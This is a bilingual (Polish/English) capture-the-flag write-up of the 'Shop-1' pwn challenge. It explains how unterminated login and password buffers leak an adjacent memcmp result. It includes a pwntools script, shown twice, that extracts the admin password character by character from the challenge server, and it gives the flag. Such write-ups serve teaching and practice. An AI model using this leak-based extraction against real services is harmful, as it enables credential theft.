Skip to content

Latest commit

 

History

History
119 lines (85 loc) · 4.13 KB

File metadata and controls

119 lines (85 loc) · 4.13 KB

Shop-1 (pwn, 100p, 34 solves)

Our marvelous Bragisdumus shop just opened. Come and see our beautiful Bragisdumus!
Login as an admin! get the admin password.
nc 185.106.120.220 1337

PL

ENG

Z zadaniem otrzymujemy binarkę serwera usługi typu CRUD z wpisami w pamięci procesu. Zgodnie z opisem celem pierwszej części jest zdobycie hasła administratora. Możemy również zalogować się na gościa z loginem i hasłem "guest".

W głównej funkcji programu widzimy, że hasło administratora od momentu wczytania go z pliku "żyje" bardzo krótko:

password = sub_FB5("adminpass.txt", &length);
result = memcmp(input_password, password, length);
free(password);

Sama funkcja wczytująca hasło z pliku wydaje się w porządku. W takim razie sprawdźmy co z wynikiem memcmp, a konkretnie gdzie na stosie znajduje się zmienna result.

char input_login[32]; // [bp-70h]
char input_password[64]; // [bp-50h]
int result; // [bp-10h]

Widzimy zatem, że zaraz za buforami na wprowadzony login i hasło.

printf("Logged in as %s\n\n", input_login);

Wprowadzony login jest również wypisywany. Może nam to sugerować, że chodzić może o wyciek result. Zwłaszcza, że w funkcji wczytującej tekst nie widzimy wstawienia null-byte'a na koniec. Musimy więc wysłać przynajmniej 32 znaki w loginie i 64 w haśle.

Wynik memcmp w naszym przypadku to dokładna różnica pomiędzy pierwszymi różniącymi się bajtami. Możemy zatem znak po znaku wyciągnąć hasło.

import pwnlib
#host = 'localhost'
host = '185.106.120.220'

client = pwnlib.tubes.remote.remote(host, 1337)

def login(username, password):
	client.recvuntil('Username: ')
	client.sendline(username)
	client.recvuntil('Password: ')
	client.sendline(password)

password = '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

for i in range(38):
	login('adminxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', password)
	login('guest', 'guest')
	n = int(client.recvlines(2)[1][109:].encode('hex'), 16)
	password = password[:i] + chr(ord(password[i]) - n) + password[i + 1:]
	client.sendline('8')
	print password

Hasło oraz flaga to ASIS{304b0f16eb430391c6c86ab0f3294211}.

ENG version

With the task we get a binary of a CRUD service in some entries inside process memory. According to task description the goal is to get the admin password. We can also login to a gues account with user/pass "gest".

In the main function of the program we can see that the admin password "lives very short" after it is read from the file:

password = sub_FB5("adminpass.txt", &length);
result = memcmp(input_password, password, length);
free(password);

The password reading function itself seems to be fine at the first glance. Therefore we check what happens with memcmp result, specifically: where on the stack is the result variable.

char input_login[32]; // [bp-70h]
char input_password[64]; // [bp-50h]
int result; // [bp-10h]

We can see that right after the login and passwrod buffers.

printf("Logged in as %s\n\n", input_login);

The login is also printed out. This can be a suggestion that it's about leaking result. Especially that in the function reading the text there is no null-byte termination inserted. So we need to sent at least 32 characters in login and 64 in password.

The result of memcmp in our case is the exact difference between first differing bytes. Therefore we can extract the password character by character:

import pwnlib
#host = 'localhost'
host = '185.106.120.220'

client = pwnlib.tubes.remote.remote(host, 1337)

def login(username, password):
	client.recvuntil('Username: ')
	client.sendline(username)
	client.recvuntil('Password: ')
	client.sendline(password)

password = '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

for i in range(38):
	login('adminxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', password)
	login('guest', 'guest')
	n = int(client.recvlines(2)[1][109:].encode('hex'), 16)
	password = password[:i] + chr(ord(password[i]) - n) + password[i + 1:]
	client.sendline('8')
	print password

Password and the flag: ASIS{304b0f16eb430391c6c86ab0f3294211}.